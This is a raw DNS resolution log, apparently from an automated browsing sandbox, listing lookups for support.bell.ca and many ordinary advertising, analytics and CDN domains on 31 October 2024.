                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.484088898 CET1.1.1.1192.168.2.90x146dNo error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.495588064 CET1.1.1.1192.168.2.90x10deNo error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.572896957 CET1.1.1.1192.168.2.90x9723No error (0)cm.g.doubleclick.net142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.730458021 CET1.1.1.1192.168.2.90x8a0dNo error (0)cdn.decibelinsight.net130.61.120.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.859364033 CET1.1.1.1192.168.2.90xf223No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.859364033 CET1.1.1.1192.168.2.90xf223No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.859364033 CET1.1.1.1192.168.2.90xf223No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.859364033 CET1.1.1.1192.168.2.90xf223No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.321783066 CET1.1.1.1192.168.2.90x384bNo error (0)app.link18.239.18.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.321783066 CET1.1.1.1192.168.2.90x384bNo error (0)app.link18.239.18.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.321783066 CET1.1.1.1192.168.2.90x384bNo error (0)app.link18.239.18.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.321783066 CET1.1.1.1192.168.2.90x384bNo error (0)app.link18.239.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.687664986 CET1.1.1.1192.168.2.90x4497No error (0)cdn.branch.io18.239.50.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.687664986 CET1.1.1.1192.168.2.90x4497No error (0)cdn.branch.io18.239.50.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.687664986 CET1.1.1.1192.168.2.90x4497No error (0)cdn.branch.io18.239.50.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:15.687664986 CET1.1.1.1192.168.2.90x4497No error (0)cdn.branch.io18.239.50.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.440802097 CET1.1.1.1192.168.2.90x8459No error (0)api2.branch.io108.156.60.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.440802097 CET1.1.1.1192.168.2.90x8459No error (0)api2.branch.io108.156.60.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.440802097 CET1.1.1.1192.168.2.90x8459No error (0)api2.branch.io108.156.60.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.440802097 CET1.1.1.1192.168.2.90x8459No error (0)api2.branch.io108.156.60.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.32.87.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.19.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.97.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.80.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.216.198.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.133.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.171.192.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487595081 CET1.1.1.1192.168.2.90xede9No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.135.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487634897 CET1.1.1.1192.168.2.90x6ba6No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487634897 CET1.1.1.1192.168.2.90x6ba6No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.487634897 CET1.1.1.1192.168.2.90x6ba6No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.622232914 CET1.1.1.1192.168.2.90xcbd5No error (0)app.link3.162.38.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.622232914 CET1.1.1.1192.168.2.90xcbd5No error (0)app.link3.162.38.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.622232914 CET1.1.1.1192.168.2.90xcbd5No error (0)app.link3.162.38.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:17.622232914 CET1.1.1.1192.168.2.90xcbd5No error (0)app.link3.162.38.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.522013903 CET1.1.1.1192.168.2.90xca36No error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.540031910 CET1.1.1.1192.168.2.90x156cNo error (0)support.bell.casupport.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:18.631592035 CET1.1.1.1192.168.2.90xad49No error (0)ml314.com34.117.77.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.519186974 CET1.1.1.1192.168.2.90xa836No error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.519231081 CET1.1.1.1192.168.2.90x5aacNo error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.690918922 CET1.1.1.1192.168.2.90x4f8bNo error (0)ps.eyeota.net18.184.216.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.693298101 CET1.1.1.1192.168.2.90x1ea3No error (0)cms.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.693298101 CET1.1.1.1192.168.2.90x1ea3No error (0)dcs-ups.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.693298101 CET1.1.1.1192.168.2.90x1ea3No error (0)dcs-ups.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.693322897 CET1.1.1.1192.168.2.90x8457No error (0)cms.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net54.194.72.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net34.255.252.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net52.49.89.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net52.50.157.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net52.208.115.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net34.248.111.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net108.128.89.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695092916 CET1.1.1.1192.168.2.90x4edfNo error (0)sync.crwdcntrl.net79.125.104.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695806980 CET1.1.1.1192.168.2.90x1ef0No error (0)ads.scorecardresearch.comd1tcwf12y4kqv3.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695806980 CET1.1.1.1192.168.2.90x1ef0No error (0)d1tcwf12y4kqv3.cloudfront.net18.65.39.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695806980 CET1.1.1.1192.168.2.90x1ef0No error (0)d1tcwf12y4kqv3.cloudfront.net18.65.39.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695806980 CET1.1.1.1192.168.2.90x1ef0No error (0)d1tcwf12y4kqv3.cloudfront.net18.65.39.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.695806980 CET1.1.1.1192.168.2.90x1ef0No error (0)d1tcwf12y4kqv3.cloudfront.net18.65.39.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.696620941 CET1.1.1.1192.168.2.90x7055No error (0)ads.scorecardresearch.comd1tcwf12y4kqv3.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.839365005 CET1.1.1.1192.168.2.90xa002No error (0)api2.branch.io108.138.26.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.839365005 CET1.1.1.1192.168.2.90xa002No error (0)api2.branch.io108.138.26.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.839365005 CET1.1.1.1192.168.2.90xa002No error (0)api2.branch.io108.138.26.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:19.839365005 CET1.1.1.1192.168.2.90xa002No error (0)api2.branch.io108.138.26.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.817193985 CET1.1.1.1192.168.2.90xd3aNo error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.817193985 CET1.1.1.1192.168.2.90xd3aNo error (0)dcs-ups.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.817193985 CET1.1.1.1192.168.2.90xd3aNo error (0)dcs-ups.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:20.817662001 CET1.1.1.1192.168.2.90x2b25No error (0)ups.analytics.yahoo.comdcs-ups.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.380275011 CET1.1.1.1192.168.2.90x52cbNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.380275011 CET1.1.1.1192.168.2.90x52cbNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.380275011 CET1.1.1.1192.168.2.90x52cbNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.380459070 CET1.1.1.1192.168.2.90x8065No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:22.380459070 CET1.1.1.1192.168.2.90x8065No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:23.912921906 CET1.1.1.1192.168.2.90x3903No error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:23.912921906 CET1.1.1.1192.168.2.90x3903No error (0)medallia2.map.fastly.net146.75.117.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:23.926765919 CET1.1.1.1192.168.2.90xbf75No error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.289380074 CET1.1.1.1192.168.2.90x553fNo error (0)s.amazon-adsystem.com98.82.156.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.962153912 CET1.1.1.1192.168.2.90x9a28No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:25.962176085 CET1.1.1.1192.168.2.90x8d06No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.787043095 CET1.1.1.1192.168.2.90x4008No error (0)td.doubleclick.net142.250.186.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.790821075 CET1.1.1.1192.168.2.90x61dcNo error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:26.791076899 CET1.1.1.1192.168.2.90x9f7fNo error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.554081917 CET1.1.1.1192.168.2.90x81bcNo error (0)analytics.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556493998 CET1.1.1.1192.168.2.90x2b30No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556514978 CET1.1.1.1192.168.2.90x695aNo error (0)analytics.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556545973 CET1.1.1.1192.168.2.90x2c22No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556556940 CET1.1.1.1192.168.2.90x7a57No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556561947 CET1.1.1.1192.168.2.90x387cNo error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.556571007 CET1.1.1.1192.168.2.90x6d56No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.557704926 CET1.1.1.1192.168.2.90x4727No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.564474106 CET1.1.1.1192.168.2.90x5c3dNo error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.565351009 CET1.1.1.1192.168.2.90xa442No error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.565351009 CET1.1.1.1192.168.2.90xa442No error (0)medallia2.map.fastly.net146.75.117.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.565363884 CET1.1.1.1192.168.2.90xc64dNo error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.566358089 CET1.1.1.1192.168.2.90x3741No error (0)resources.digital-cloud.medallia.camedallia2.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.566358089 CET1.1.1.1192.168.2.90x3741No error (0)medallia2.map.fastly.net146.75.117.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.665527105 CET1.1.1.1192.168.2.90x92f9No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.666220903 CET1.1.1.1192.168.2.90xdfe2No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:28.666220903 CET1.1.1.1192.168.2.90xdfe2No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.493185043 CET1.1.1.1192.168.2.90x26e5No error (0)stats.g.doubleclick.net64.233.167.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.493185043 CET1.1.1.1192.168.2.90x26e5No error (0)stats.g.doubleclick.net64.233.167.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.493185043 CET1.1.1.1192.168.2.90x26e5No error (0)stats.g.doubleclick.net64.233.167.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.493185043 CET1.1.1.1192.168.2.90x26e5No error (0)stats.g.doubleclick.net64.233.167.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.495559931 CET1.1.1.1192.168.2.90xf90bNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.495739937 CET1.1.1.1192.168.2.90x5ab8No error (0)googleads.g.doubleclick.net142.250.186.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.592698097 CET1.1.1.1192.168.2.90x9848No error (0)data1.bell.cabell.ca.ssl.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.594562054 CET1.1.1.1192.168.2.90xfa03No error (0)data1.bell.cabell.ca.ssl.sc.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.594562054 CET1.1.1.1192.168.2.90xfa03No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.594562054 CET1.1.1.1192.168.2.90xfa03No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.594562054 CET1.1.1.1192.168.2.90xfa03No error (0)bell.ca.ssl.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.715683937 CET1.1.1.1192.168.2.90xc194No error (0)analytics-fe.digital-cloud.medallia.cadigital.lb.can.medallia.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.717137098 CET1.1.1.1192.168.2.90x84d7No error (0)analytics-fe.digital-cloud.medallia.cadigital.lb.can.medallia.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:32.717137098 CET1.1.1.1192.168.2.90x84d7No error (0)digital.lb.can.medallia.ca147.75.178.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:35.749649048 CET1.1.1.1192.168.2.90xa3d4No error (0)udc-neb.kampyle.comcooladata.kampyle.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:35.749649048 CET1.1.1.1192.168.2.90xa3d4No error (0)cooladata.kampyle.com35.241.45.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:35.750083923 CET1.1.1.1192.168.2.90xabcfNo error (0)udc-neb.kampyle.comcooladata.kampyle.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847258091 CET1.1.1.1192.168.2.90x262cNo error (0)02179915.akstat.iowildcard46.akstat.io.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:38.847834110 CET1.1.1.1192.168.2.90xfea7No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
